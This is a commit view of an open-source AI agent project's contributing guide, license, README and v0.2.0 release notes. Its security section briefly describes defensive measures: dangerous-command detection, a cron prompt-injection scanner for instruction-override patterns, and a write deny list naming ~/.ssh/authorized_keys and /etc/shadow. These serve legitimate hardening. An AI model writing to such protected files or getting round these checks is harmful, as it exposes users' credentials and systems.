"""Handler. Returns a string result (often JSON)."""
result = do_work(param1, param2)
return json.dumps(result)
MY_TOOL_SCHEMA = {
"type": "function",
"function": {
"name": "my_tool",
"description": "What this tool does and when the agent should use it.",
"parameters": {
"type": "object",
"properties": {
"param1": {"type": "string", "description": "What param1 is"},
"param2": {"type": "integer", "description": "What param2 is", "default": 10},
},
"required": ["param1"],
},
},
}
def _check_requirements() -> bool:
"""Return True if this tool's dependencies are available."""
return True
registry.register(
name="my_tool",
toolset="my_toolset",
schema=MY_TOOL_SCHEMA,
handler=lambda args, **kw: my_tool(**args, **kw),
check_fn=_check_requirements,
)
```
Then add the import to `model_tools.py` in the `_modules` list:
```python
_modules = [
# ... existing modules ...
"tools.my_tool",
]
```
If it's a new toolset, add it to `toolsets.py` and to the relevant platform presets.
---
## Adding a Skill
Bundled skills live in `skills/` organized by category. Official optional skills use the same structure in `optional-skills/`:
```
skills/
├── research/
│ └── arxiv/
│ ├── SKILL.md # Required: main instructions
│ └── scripts/ # Optional: helper scripts
│ └── search_arxiv.py
├── productivity/
│ └── ocr-and-documents/
│ ├── SKILL.md
│ ├── scripts/
│ └── references/
└── ...
```
### SKILL.md format
```markdown
---
name: my-skill
description: Brief description (shown in skill search results)
version: 1.0.0
author: Your Name
license: MIT
platforms: [macos, linux] # Optional — restrict to specific OS platforms
# Valid: macos, linux, windows
# Omit to load on all platforms (default)
required_environment_variables: # Optional — secure setup-on-load metadata
- name: MY_API_KEY
prompt: API key
help: Where to get it
required_for: full functionality
prerequisites: # Optional legacy runtime requirements
env_vars: [MY_API_KEY] # Backward-compatible alias for required env vars
commands: [curl, jq] # Advisory only; does not hide the skill
metadata:
hermes:
tags: [Category, Subcategory, Keywords]
related_skills: [other-skill-name]
fallback_for_toolsets: [web] # Optional — show only when toolset is unavailable
requires_toolsets: [terminal] # Optional — show only when toolset is available
---
# Skill Title
Brief intro.
## When to Use
Trigger conditions — when should the agent load this skill?
## Quick Reference
Table of common commands or API calls.
## Procedure
Step-by-step instructions the agent follows.
## Pitfalls
Known failure modes and how to handle them.
## Verification
How the agent confirms it worked.
```
### Platform-specific skills
Skills can declare which OS platforms they support via the `platforms` frontmatter field. Skills with this field are automatically hidden from the system prompt, `skills_list()`, and slash commands on incompatible platforms.
```yaml
platforms: [macos] # macOS only (e.g., iMessage, Apple Reminders)
platforms: [macos, linux] # macOS and Linux
platforms: [windows] # Windows only
```
If the field is omitted or empty, the skill loads on all platforms (backward compatible). See `skills/apple/` for examples of macOS-only skills.
### Conditional skill activation
Skills can declare conditions that control when they appear in the system prompt, based on which tools and toolsets are available in the current session. This is primarily used for **fallback skills** — alternatives that should only be shown when a primary tool is unavailable.
Four fields are supported under `metadata.hermes`:
```yaml
metadata:
hermes:
fallback_for_toolsets: [web] # Show ONLY when these toolsets are unavailable
requires_toolsets: [terminal] # Show ONLY when these toolsets are available
fallback_for_tools: [web_search] # Show ONLY when these specific tools are unavailable
requires_tools: [terminal] # Show ONLY when these specific tools are available
```
**Semantics:**
- `fallback_for_*`: The skill is a backup. It is **hidden** when the listed tools/toolsets are available, and **shown** when they are unavailable. Use this for free alternatives to premium tools.
- `requires_*`: The skill needs certain tools to function. It is **hidden** when the listed tools/toolsets are unavailable. Use this for skills that depend on specific capabilities (e.g., a skill that only makes sense with terminal access).
- If both are specified, both conditions must be satisfied for the skill to appear.
- If neither is specified, the skill is always shown (backward compatible).
**Examples:**
```yaml
# DuckDuckGo search — shown when Firecrawl (web toolset) is unavailable
metadata:
hermes:
fallback_for_toolsets: [web]
# Smart home skill — only useful when terminal is available
metadata:
hermes:
requires_toolsets: [terminal]
# Local browser fallback — shown when Browserbase is unavailable
metadata:
hermes:
fallback_for_toolsets: [browser]
```
The filtering happens at prompt build time in `agent/prompt_builder.py`. The `build_skills_system_prompt()` function receives the set of available tools and toolsets from the agent and uses `_skill_should_show()` to evaluate each skill's conditions.
### Skill setup metadata
Skills can declare secure setup-on-load metadata via the `required_environment_variables` frontmatter field. Missing values do not hide the skill from discovery; they trigger a CLI-only secure prompt when the skill is actually loaded.
```yaml
required_environment_variables:
- name: TENOR_API_KEY
prompt: Tenor API key
help: Get a key from https://developers.google.com/tenor
required_for: full functionality
```
The user may skip setup and keep loading the skill. Hermes only exposes metadata (`stored_as`, `skipped`, `validated`) to the model — never the secret value.
Legacy `prerequisites.env_vars` remains supported and is normalized into the new representation.
```yaml
prerequisites:
env_vars: [TENOR_API_KEY] # Legacy alias for required_environment_variables
commands: [curl, jq] # Advisory CLI checks
```
Gateway and messaging sessions never collect secrets in-band; they instruct the user to run `hermes setup` or update `~/.hermes/.env` locally.
**When to declare required environment variables:**
- The skill uses an API key or token that should be collected securely at load time
- The skill can still be useful if the user skips setup, but may degrade gracefully
**When to declare command prerequisites:**
- The skill relies on a CLI tool that may not be installed (e.g., `himalaya`, `openhue`, `ddgs`)
- Treat command checks as guidance, not discovery-time hiding
See `skills/gifs/gif-search/` and `skills/email/himalaya/` for examples.
### Skill guidelines
- **No external dependencies unless absolutely necessary.** Prefer stdlib Python, curl, and existing Hermes tools (`web_extract`, `terminal`, `read_file`).
- **Progressive disclosure.** Put the most common workflow first. Edge cases and advanced usage go at the bottom.
- **Include helper scripts** for XML/JSON parsing or complex logic — don't expect the LLM to write parsers inline every time.
- **Test it.** Run `hermes --toolsets skills -q "Use the X skill to do Y"` and verify the agent follows the instructions correctly.
---
## Adding a Skin / Theme
Hermes uses a data-driven skin system — no code changes needed to add a new skin.
**Option A: User skin (YAML file)**
Create `~/.hermes/skins/<name>.yaml`:
```yaml
name: mytheme
description: Short description of the theme
colors:
banner_border: "#HEX" # Panel border color
banner_title: "#HEX" # Panel title color
banner_accent: "#HEX" # Section header color
banner_dim: "#HEX" # Muted/dim text color
banner_text: "#HEX" # Body text color
response_border: "#HEX" # Response box border
spinner:
waiting_faces: ["(⚔)", "(⛨)"]
thinking_faces: ["(⚔)", "(⌁)"]
thinking_verbs: ["forging", "plotting"]
wings: # Optional left/right decorations
- ["⟪⚔", "⚔⟫"]
branding:
agent_name: "My Agent"
welcome: "Welcome message"
response_label: " ⚔ Agent "
prompt_symbol: "⚔ "
tool_prefix: "╎" # Tool output line prefix
```
All fields are optional — missing values inherit from the default skin.
**Option B: Built-in skin**
Add to `_BUILTIN_SKINS` dict in `hermes_cli/skin_engine.py`. Use the same schema as above but as a Python dict. Built-in skins ship with the package and are always available.
**Activating:**
- CLI: `/skin mytheme` or set `display.skin: mytheme` in config.yaml
- Config: `display: { skin: mytheme }`
See `hermes_cli/skin_engine.py` for the full schema and existing skins as examples.
---
## Cross-Platform Compatibility
Hermes runs on Linux, macOS, and Windows. When writing code that touches the OS:
### Critical rules
1. **`termios` and `fcntl` are Unix-only.** Always catch both `ImportError` and `NotImplementedError`:
```python
try:
from simple_term_menu import TerminalMenu
menu = TerminalMenu(options)
idx = menu.show()
except (ImportError, NotImplementedError):
# Fallback: numbered menu for Windows
for i, opt in enumerate(options):
print(f" {i+1}. {opt}")
idx = int(input("Choice: ")) - 1
```
2. **File encoding.** Windows may save `.env` files in `cp1252`. Always handle encoding errors:
```python
try:
load_dotenv(env_path)
except UnicodeDecodeError:
load_dotenv(env_path, encoding="latin-1")
```
3. **Process management.** `os.setsid()`, `os.killpg()`, and signal handling differ on Windows. Use platform checks:
```python
import platform
if platform.system() != "Windows":
kwargs["preexec_fn"] = os.setsid
```
4. **Path separators.** Use `pathlib.Path` instead of string concatenation with `/`.
5. **Shell commands in installers.** If you change `scripts/install.sh`, check if the equivalent change is needed in `scripts/install.ps1`.
---
## Security Considerations
Hermes has terminal access. Security matters.
### Existing protections
| Layer | Implementation |
|-------|---------------|
| **Sudo password piping** | Uses `shlex.quote()` to prevent shell injection |
| **Dangerous command detection** | Regex patterns in `tools/approval.py` with user approval flow |
| **Cron prompt injection** | Scanner in `tools/cronjob_tools.py` blocks instruction-override patterns |
| **Write deny list** | Protected paths (`~/.ssh/authorized_keys`, `/etc/shadow`) resolved via `os.path.realpath()` to prevent symlink bypass |
| **Skills guard** | Security scanner for hub-installed skills (`tools/skills_guard.py`) |
| **Code execution sandbox** | `execute_code` child process runs with API keys stripped from environment |
| **Container hardening** | Docker: all capabilities dropped, no privilege escalation, PID limits, size-limited tmpfs |
### When contributing security-sensitive code
- **Always use `shlex.quote()`** when interpolating user input into shell commands
- **Resolve symlinks** with `os.path.realpath()` before path-based access control checks
- **Don't log secrets.** API keys, tokens, and passwords should never appear in log output
- **Catch broad exceptions** around tool execution so a single failure doesn't crash the agent loop
- **Test on all platforms** if your change touches file paths, process management, or shell commands
If your PR affects security, note it explicitly in the description.
---
## Pull Request Process
### Branch naming
```
fix/description # Bug fixes
feat/description # New features
docs/description # Documentation
test/description # Tests
refactor/description # Code restructuring
```
### Before submitting
1. **Run tests**: `pytest tests/ -v`
2. **Test manually**: Run `hermes` and exercise the code path you changed
3. **Check cross-platform impact**: If you touch file I/O, process management, or terminal handling, consider Windows and macOS
4. **Keep PRs focused**: One logical change per PR. Don't mix a bug fix with a refactor with a new feature.
### PR description
Include:
- **What** changed and **why**
- **How to test** it (reproduction steps for bugs, usage examples for features)
- **What platforms** you tested on
- Reference any related issues
### Commit messages
We use [Conventional Commits](https://www.conventionalcommits.org/):
```
<type>(<scope>): <description>
```
| Type | Use for |
|------|---------|
| `fix` | Bug fixes |
| `feat` | New features |
| `docs` | Documentation |
| `test` | Tests |
| `refactor` | Code restructuring (no behavior change) |
| `chore` | Build, CI, dependency updates |
Scopes: `cli`, `gateway`, `tools`, `skills`, `agent`, `install`, `whatsapp`, `security`, etc.
Examples:
```
fix(cli): prevent crash in save_config_value when model is a string
feat(gateway): add WhatsApp multi-user session isolation
fix(security): prevent shell injection in sudo password piping
test(tools): add unit tests for file_operations
```
---
## Reporting Issues
- Use [GitHub Issues](https://github.com/NousResearch/hermes-agent/issues)
- Include: OS, Python version, Hermes version (`hermes version`), full error traceback
- Include steps to reproduce
- Check existing issues before creating duplicates
- For security vulnerabilities, please report privately
---
## Community
- **Discord**: [discord.gg/NousResearch](https://discord.gg/NousResearch) — for questions, showcasing projects, and sharing skills
- **GitHub Discussions**: For design proposals and architecture discussions
- **Skills Hub**: Upload specialized skills to a registry and share them with the community
---
## License
By contributing, you agree that your contributions will be licensed under the [MIT License](LICENSE).

21
LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2025 Nous Research
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

344
README.md
View File

@@ -1,243 +1,159 @@
# Hermes Agent
<p align="center">
<img src="assets/banner.png" alt="Hermes Agent" width="100%">
</p>
An AI agent with advanced tool-calling capabilities, featuring a flexible toolsets system for organizing and managing tools.
# Hermes Agent ⚕
## Features
<p align="center">
<a href="https://hermes-agent.nousresearch.com/docs/"><img src="https://img.shields.io/badge/Docs-hermes--agent.nousresearch.com-FFD700?style=for-the-badge" alt="Documentation"></a>
<a href="https://discord.gg/NousResearch"><img src="https://img.shields.io/badge/Discord-5865F2?style=for-the-badge&logo=discord&logoColor=white" alt="Discord"></a>
<a href="https://github.com/NousResearch/hermes-agent/blob/main/LICENSE"><img src="https://img.shields.io/badge/License-MIT-green?style=for-the-badge" alt="License: MIT"></a>
<a href="https://nousresearch.com"><img src="https://img.shields.io/badge/Built%20by-Nous%20Research-blueviolet?style=for-the-badge" alt="Built by Nous Research"></a>
</p>
- **Web Tools**: Search, extract content, and crawl websites
- **Terminal Tools**: Execute commands with interactive session support
- **Vision Tools**: Analyze images from URLs
- **Reasoning Tools**: Advanced multi-model reasoning (Mixture of Agents)
- **Creative Tools**: Generate images from text prompts
- **Toolsets System**: Organize tools into logical groups for different scenarios
- **Batch Processing**: Process datasets in parallel with checkpointing and statistics tracking
- **Ephemeral System Prompts**: Guide model behavior without polluting training datasets
**The self-improving AI agent built by [Nous Research](https://nousresearch.com).** It's the only agent with a built-in learning loop — it creates skills from experience, improves them during use, nudges itself to persist knowledge, searches its own past conversations, and builds a deepening model of who you are across sessions. Run it on a $5 VPS, a GPU cluster, or serverless infrastructure that costs nearly nothing when idle. It's not tied to your laptop — talk to it from Telegram while it works on a cloud VM.
## Setup
Use any model you want — [Nous Portal](https://portal.nousresearch.com), [OpenRouter](https://openrouter.ai) (200+ models), [z.ai/GLM](https://z.ai), [Kimi/Moonshot](https://platform.moonshot.ai), [MiniMax](https://www.minimax.io), OpenAI, or your own endpoint. Switch with `hermes model` — no code changes, no lock-in.
### 1. Install Dependencies
```bash
# Create and activate virtual environment (recommended)
python3 -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
<table>
<tr><td><b>A real terminal interface</b></td><td>Full TUI with multiline editing, slash-command autocomplete, conversation history, interrupt-and-redirect, and streaming tool output.</td></tr>
<tr><td><b>Lives where you do</b></td><td>Telegram, Discord, Slack, WhatsApp, Signal, and CLI — all from a single gateway process. Voice memo transcription, cross-platform conversation continuity.</td></tr>
<tr><td><b>A closed learning loop</b></td><td>Agent-curated memory with periodic nudges. Autonomous skill creation after complex tasks. Skills self-improve during use. FTS5 session search with LLM summarization for cross-session recall. <a href="https://github.com/plastic-labs/honcho">Honcho</a> dialectic user modeling. Compatible with the <a href="https://agentskills.io">agentskills.io</a> open standard.</td></tr>
<tr><td><b>Scheduled automations</b></td><td>Built-in cron scheduler with delivery to any platform. Daily reports, nightly backups, weekly audits — all in natural language, running unattended.</td></tr>
<tr><td><b>Delegates and parallelizes</b></td><td>Spawn isolated subagents for parallel workstreams. Write Python scripts that call tools via RPC, collapsing multi-step pipelines into zero-context-cost turns.</td></tr>
<tr><td><b>Runs anywhere, not just your laptop</b></td><td>Six terminal backends — local, Docker, SSH, Daytona, Singularity, and Modal. Daytona and Modal offer serverless persistence — your agent's environment hibernates when idle and wakes on demand, costing nearly nothing between sessions. Run it on a $5 VPS or a GPU cluster.</td></tr>
<tr><td><b>Research-ready</b></td><td>Batch trajectory generation, Atropos RL environments, trajectory compression for training the next generation of tool-calling models.</td></tr>
</table>
# Install required packages
pip install -r requirements.txt
---
# Install Hecate for terminal tools
git clone git@github.com:NousResearch/hecate.git
cd hecate
pip install -e .
cd ..
```
### 2. Configure Environment Variables
```bash
# Copy the example environment file
cp .env.example .env
# Edit .env and add your API keys
nano .env # or use your preferred editor
```
**Required API Keys:**
- `ANTHROPIC_API_KEY` - Main agent model (get at: https://console.anthropic.com/)
- `FIRECRAWL_API_KEY` - Web tools (get at: https://firecrawl.dev/)
- `NOUS_API_KEY` - Vision & reasoning tools (get at: https://inference-api.nousresearch.com/)
- `MORPH_API_KEY` - Terminal tools (get at: https://morph.so/)
- `FAL_KEY` - Image generation (get at: https://fal.ai/)
- `OPENAI_API_KEY` - Optional, for some Hecate features
See `.env.example` for all available configuration options including debug settings and terminal tool configuration.
## Toolsets System
The agent uses a toolsets system for organizing and managing tools. All tools must be part of a toolset to be accessible - individual tool selection is not supported. This ensures consistent and logical grouping of capabilities.
### Key Concepts
- **Toolsets**: Logical groups of tools for specific use cases (e.g., "research", "development", "debugging")
- **Composition**: Toolsets can include other toolsets for powerful combinations
- **Custom Toolsets**: Create your own toolsets at runtime or by editing `toolsets.py`
- **Toolset-Only Access**: Tools are only accessible through toolsets, not individually
### Available Toolsets
See `toolsets.py` for the complete list of predefined toolsets including:
- Basic toolsets (web, terminal, vision, creative, reasoning)
- Composite toolsets (research, development, analysis, etc.)
- Scenario-specific toolsets (debugging, documentation, API testing, etc.)
- Special toolsets (safe mode without terminal, minimal, offline)
### Using Toolsets
## Quick Install
```bash
# Use a predefined toolset
python run_agent.py --enabled_toolsets=research --query "Find latest AI papers"
# Combine multiple toolsets
python run_agent.py --enabled_toolsets=web,vision --query "Analyze this website"
# Enable all toolsets explicitly (same as omitting the flag)
python run_agent.py --enabled_toolsets=all --query "Do web research and run commands if helpful"
# Safe mode (no terminal access)
python run_agent.py --enabled_toolsets=safe --query "Help without running commands"
# List all available toolsets and tools
python run_agent.py --list_tools
curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.sh | bash
```
For detailed documentation on toolsets, see `TOOLSETS_README.md`.
Works on Linux, macOS, and WSL2. The installer handles everything — Python, Node.js, dependencies, and the `hermes` command. No prerequisites except git.
## Basic Usage
> **Windows:** Native Windows is not supported. Please install [WSL2](https://learn.microsoft.com/en-us/windows/wsl/install) and run the command above.
### Default (all tools enabled)
```bash
python run_agent.py \
--query "search up the latest docs on jit in python 3.13 and write me basic example that's not in their docs. profile its perf" \
--max_turns 20 \
--model claude-sonnet-4-20250514 \
--base_url https://api.anthropic.com/v1/ \
--api_key $ANTHROPIC_API_KEY
```
### With specific toolset
```bash
python run_agent.py \
--query "Debug this Python error" \
--enabled_toolsets=debugging \
--model claude-sonnet-4-20250514 \
--api_key $ANTHROPIC_API_KEY
```
### Python API
```python
from run_agent import AIAgent
# Use a specific toolset
agent = AIAgent(
model="claude-opus-4-20250514",
enabled_toolsets=["research"]
)
response = agent.chat("Find information about quantum computing")
# Create custom toolset at runtime
from toolsets import create_custom_toolset
create_custom_toolset(
name="my_tools",
description="My custom toolkit",
tools=["web_search"],
includes=["terminal", "vision"]
)
agent = AIAgent(enabled_toolsets=["my_tools"])
```
## Batch Processing
Process multiple prompts from a dataset in parallel with automatic checkpointing and statistics tracking:
After installation:
```bash
# Basic batch processing
python batch_runner.py \
--dataset_file=prompts.jsonl \
--batch_size=20 \
--run_name=my_run
# With specific distribution
python batch_runner.py \
--dataset_file=prompts.jsonl \
--batch_size=20 \
--run_name=image_run \
--distribution=image_gen \
--num_workers=4
source ~/.bashrc # reload shell (or: source ~/.zshrc)
hermes # start chatting!
```
**Key Features:**
- Parallel processing with configurable workers
- Toolset distributions for varied data generation
- Automatic checkpointing and resume capability
- Combined output in `data/<run_name>/trajectories.jsonl`
- Tool usage statistics and success rates
---
**Quick Start:** See [QUICKSTART_BATCH.md](QUICKSTART_BATCH.md) for a 5-minute getting started guide.
**Full Documentation:** See [BATCH_PROCESSING.md](BATCH_PROCESSING.md) for comprehensive documentation.
## Getting Started
### Ephemeral System Prompts
The ephemeral system prompt feature allows you to guide the model's behavior during batch processing **without** saving that prompt to the training dataset trajectories. This is useful for:
- Guiding model behavior during data collection
- Adding task-specific instructions
- Keeping saved trajectories clean and focused on tool-calling format
**Example:**
```bash
python batch_runner.py \
--dataset_file=prompts.jsonl \
--batch_size=10 \
--run_name=my_run \
--ephemeral_system_prompt="You are a helpful assistant focused on image generation."
hermes # Interactive CLI — start a conversation
hermes model # Choose your LLM provider and model
hermes tools # Configure which tools are enabled
hermes config set # Set individual config values
hermes gateway # Start the messaging gateway (Telegram, Discord, etc.)
hermes setup # Run the full setup wizard (configures everything at once)
hermes claw migrate # Migrate from OpenClaw (if coming from OpenClaw)
hermes update # Update to the latest version
hermes doctor # Diagnose any issues
```
The ephemeral prompt will influence the model's behavior during execution, but **only the standard tool-calling system prompt** will be saved in the trajectory files.
📖 **[Full documentation →](https://hermes-agent.nousresearch.com/docs/)**
**Documentation:** See [docs/ephemeral_system_prompt.md](docs/ephemeral_system_prompt.md) for complete details.
## Command Line Arguments
**Single Agent (`run_agent.py`):**
- `--query`: The question or task for the agent
- `--model`: Model to use (default: claude-opus-4-20250514)
- `--api_key`: API key for authentication
- `--base_url`: API endpoint URL
- `--max_turns`: Maximum number of tool-calling iterations
- `--enabled_toolsets`: Comma-separated list of toolsets to enable. Use `all` (or `*`) to enable everything. If omitted, all toolsets are enabled by default.
- `--disabled_toolsets`: Comma-separated list of toolsets to disable
- `--list_tools`: List all available toolsets and tools
- `--save_trajectories`: Save conversation trajectories to JSONL files
**Batch Processing (`batch_runner.py`):**
- `--dataset_file`: Path to JSONL file with prompts
- `--batch_size`: Number of prompts per batch
- `--run_name`: Name for this run (for output/checkpointing)
- `--distribution`: Toolset distribution to use (default: "default")
- `--num_workers`: Number of parallel workers (default: 4)
- `--resume`: Resume from checkpoint if interrupted
- `--ephemeral_system_prompt`: System prompt used during execution but NOT saved to trajectories
- `--list_distributions`: List available toolset distributions
## Environment Variables
All environment variables can be configured in the `.env` file (copy from `.env.example`).
**Core API Keys:**
- `ANTHROPIC_API_KEY`: Main agent model
- `FIRECRAWL_API_KEY`: Web tools (search, extract, crawl)
- `NOUS_API_KEY`: Vision and reasoning tools
- `MORPH_API_KEY`: Terminal tools
- `FAL_KEY`: Image generation tools
- `OPENAI_API_KEY`: Optional, for some Hecate features
**Configuration Options:**
- `HECATE_VM_LIFETIME_SECONDS`: VM lifetime (default: 300)
- `HECATE_DEFAULT_SNAPSHOT_ID`: Default snapshot (default: snapshot_p5294qxt)
- `WEB_TOOLS_DEBUG`, `VISION_TOOLS_DEBUG`, `MOA_TOOLS_DEBUG`, `IMAGE_TOOLS_DEBUG`: Enable debug logging
---
## Documentation
**Single Agent Usage:**
- `TOOLSETS_README.md`: Comprehensive guide to the toolsets system
- `toolsets.py`: View and modify available toolsets
- `model_tools.py`: Core tool definitions and handlers
All documentation lives at **[hermes-agent.nousresearch.com/docs](https://hermes-agent.nousresearch.com/docs/)**:
**Batch Processing:**
- `QUICKSTART_BATCH.md`: 5-minute quick start guide
- `BATCH_PROCESSING.md`: Complete batch processing documentation
- `toolset_distributions.py`: Toolset distributions for data generation
| Section | What's Covered |
|---------|---------------|
| [Quickstart](https://hermes-agent.nousresearch.com/docs/getting-started/quickstart) | Install → setup → first conversation in 2 minutes |
| [CLI Usage](https://hermes-agent.nousresearch.com/docs/user-guide/cli) | Commands, keybindings, personalities, sessions |
| [Configuration](https://hermes-agent.nousresearch.com/docs/user-guide/configuration) | Config file, providers, models, all options |
| [Messaging Gateway](https://hermes-agent.nousresearch.com/docs/user-guide/messaging) | Telegram, Discord, Slack, WhatsApp, Signal, Home Assistant |
| [Security](https://hermes-agent.nousresearch.com/docs/user-guide/security) | Command approval, DM pairing, container isolation |
| [Tools & Toolsets](https://hermes-agent.nousresearch.com/docs/user-guide/features/tools) | 40+ tools, toolset system, terminal backends |
| [Skills System](https://hermes-agent.nousresearch.com/docs/user-guide/features/skills) | Procedural memory, Skills Hub, creating skills |
| [Memory](https://hermes-agent.nousresearch.com/docs/user-guide/features/memory) | Persistent memory, user profiles, best practices |
| [MCP Integration](https://hermes-agent.nousresearch.com/docs/user-guide/features/mcp) | Connect any MCP server for extended capabilities |
| [Cron Scheduling](https://hermes-agent.nousresearch.com/docs/user-guide/features/cron) | Scheduled tasks with platform delivery |
| [Context Files](https://hermes-agent.nousresearch.com/docs/user-guide/features/context-files) | Project context that shapes every conversation |
| [Architecture](https://hermes-agent.nousresearch.com/docs/developer-guide/architecture) | Project structure, agent loop, key classes |
| [Contributing](https://hermes-agent.nousresearch.com/docs/developer-guide/contributing) | Development setup, PR process, code style |
| [CLI Reference](https://hermes-agent.nousresearch.com/docs/reference/cli-commands) | All commands and flags |
| [Environment Variables](https://hermes-agent.nousresearch.com/docs/reference/environment-variables) | Complete env var reference |
## Examples
---
See `TOOLSETS_README.md` for extensive examples of using different toolsets for various scenarios.
## Migrating from OpenClaw
If you're coming from OpenClaw, Hermes can automatically import your settings, memories, skills, and API keys.
**During first-time setup:** The setup wizard (`hermes setup`) automatically detects `~/.openclaw` and offers to migrate before configuration begins.
**Anytime after install:**
```bash
hermes claw migrate # Interactive migration (full preset)
hermes claw migrate --dry-run # Preview what would be migrated
hermes claw migrate --preset user-data # Migrate without secrets
hermes claw migrate --overwrite # Overwrite existing conflicts
```
What gets imported:
- **SOUL.md** — persona file
- **Memories** — MEMORY.md and USER.md entries
- **Skills** — user-created skills → `~/.hermes/skills/openclaw-imports/`
- **Command allowlist** — approval patterns
- **Messaging settings** — platform configs, allowed users, working directory
- **API keys** — allowlisted secrets (Telegram, OpenRouter, OpenAI, Anthropic, ElevenLabs)
- **TTS assets** — workspace audio files
- **Workspace instructions** — AGENTS.md (with `--workspace-target`)
See `hermes claw migrate --help` for all options, or use the `openclaw-migration` skill for an interactive agent-guided migration with dry-run previews.
---
## Contributing
We welcome contributions! See the [Contributing Guide](https://hermes-agent.nousresearch.com/docs/developer-guide/contributing) for development setup, code style, and PR process.
Quick start for contributors:
```bash
git clone https://github.com/NousResearch/hermes-agent.git
cd hermes-agent
git submodule update --init mini-swe-agent # required terminal backend
curl -LsSf https://astral.sh/uv/install.sh | sh
uv venv .venv --python 3.11
source .venv/bin/activate
uv pip install -e ".[all,dev]"
uv pip install -e "./mini-swe-agent"
python -m pytest tests/ -q
```
> **RL Training (optional):** To work on the RL/Tinker-Atropos integration, also run:
> ```bash
> git submodule update --init tinker-atropos
> uv pip install -e "./tinker-atropos"
> ```
---
## Community
- 💬 [Discord](https://discord.gg/NousResearch)
- 📚 [Skills Hub](https://agentskills.io)
- 🐛 [Issues](https://github.com/NousResearch/hermes-agent/issues)
- 💡 [Discussions](https://github.com/NousResearch/hermes-agent/discussions)
---
## License
MIT — see [LICENSE](LICENSE).
Built by [Nous Research](https://nousresearch.com).

383
RELEASE_v0.2.0.md Normal file
View File

@@ -0,0 +1,383 @@
# Hermes Agent v0.2.0 (v2026.3.12)
**Release Date:** March 12, 2026
> First tagged release since v0.1.0 (the initial pre-public foundation). In just over two weeks, Hermes Agent went from a small internal project to a full-featured AI agent platform — thanks to an explosion of community contributions. This release covers **216 merged pull requests** from **63 contributors**, resolving **119 issues**.
---
## ✨ Highlights
- **Multi-Platform Messaging Gateway** — Telegram, Discord, Slack, WhatsApp, Signal, Email (IMAP/SMTP), and Home Assistant platforms with unified session management, media attachments, and per-platform tool configuration.
- **MCP (Model Context Protocol) Client** — Native MCP support with stdio and HTTP transports, reconnection, resource/prompt discovery, and sampling (server-initiated LLM requests). ([#291](https://github.com/NousResearch/hermes-agent/pull/291) — @0xbyt4, [#301](https://github.com/NousResearch/hermes-agent/pull/301), [#753](https://github.com/NousResearch/hermes-agent/pull/753))
- **Skills Ecosystem** — 70+ bundled and optional skills across 15+ categories with a Skills Hub for community discovery, per-platform enable/disable, conditional activation based on tool availability, and prerequisite validation. ([#743](https://github.com/NousResearch/hermes-agent/pull/743) — @teyrebaz33, [#785](https://github.com/NousResearch/hermes-agent/pull/785) — @teyrebaz33)
- **Centralized Provider Router** — Unified `call_llm()`/`async_call_llm()` API replaces scattered provider logic across vision, summarization, compression, and trajectory saving. All auxiliary consumers route through a single code path with automatic credential resolution. ([#1003](https://github.com/NousResearch/hermes-agent/pull/1003))
- **ACP Server** — VS Code, Zed, and JetBrains editor integration via the Agent Communication Protocol standard. ([#949](https://github.com/NousResearch/hermes-agent/pull/949))
- **CLI Skin/Theme Engine** — Data-driven visual customization: banners, spinners, colors, branding. 7 built-in skins + custom YAML skins.
- **Git Worktree Isolation** — `hermes -w` launches isolated agent sessions in git worktrees for safe parallel work on the same repo. ([#654](https://github.com/NousResearch/hermes-agent/pull/654))
- **Filesystem Checkpoints & Rollback** — Automatic snapshots before destructive operations with `/rollback` to restore. ([#824](https://github.com/NousResearch/hermes-agent/pull/824))
- **3,289 Tests** — From near-zero test coverage to a comprehensive test suite covering agent, gateway, tools, cron, and CLI.
---
## 🏗️ Core Agent & Architecture
### Provider & Model Support
- Centralized provider router with `resolve_provider_client()` + `call_llm()` API ([#1003](https://github.com/NousResearch/hermes-agent/pull/1003))
- Nous Portal as first-class provider in setup ([#644](https://github.com/NousResearch/hermes-agent/issues/644))
- OpenAI Codex (Responses API) with ChatGPT subscription support ([#43](https://github.com/NousResearch/hermes-agent/pull/43)) — @grp06
- Codex OAuth vision support + multimodal content adapter
- Validate `/model` against live API instead of hardcoded lists
- Self-hosted Firecrawl support ([#460](https://github.com/NousResearch/hermes-agent/pull/460)) — @caentzminger
- Kimi Code API support ([#635](https://github.com/NousResearch/hermes-agent/pull/635)) — @christomitov
- MiniMax model ID update ([#473](https://github.com/NousResearch/hermes-agent/pull/473)) — @tars90percent
- OpenRouter provider routing configuration (provider_preferences)
- Nous credential refresh on 401 errors ([#571](https://github.com/NousResearch/hermes-agent/pull/571), [#269](https://github.com/NousResearch/hermes-agent/pull/269)) — @rewbs
- z.ai/GLM, Kimi/Moonshot, MiniMax, Azure OpenAI as first-class providers
- Unified `/model` and `/provider` into single view
### Agent Loop & Conversation
- Simple fallback model for provider resilience ([#740](https://github.com/NousResearch/hermes-agent/pull/740))
- Shared iteration budget across parent + subagent delegation
- Iteration budget pressure via tool result injection
- Configurable subagent provider/model with full credential resolution
- Handle 413 payload-too-large via compression instead of aborting ([#153](https://github.com/NousResearch/hermes-agent/pull/153)) — @tekelala
- Retry with rebuilt payload after compression ([#616](https://github.com/NousResearch/hermes-agent/pull/616)) — @tripledoublev
- Auto-compress pathologically large gateway sessions ([#628](https://github.com/NousResearch/hermes-agent/issues/628))
- Tool call repair middleware — auto-lowercase and invalid tool handler
- Reasoning effort configuration and `/reasoning` command ([#921](https://github.com/NousResearch/hermes-agent/pull/921))
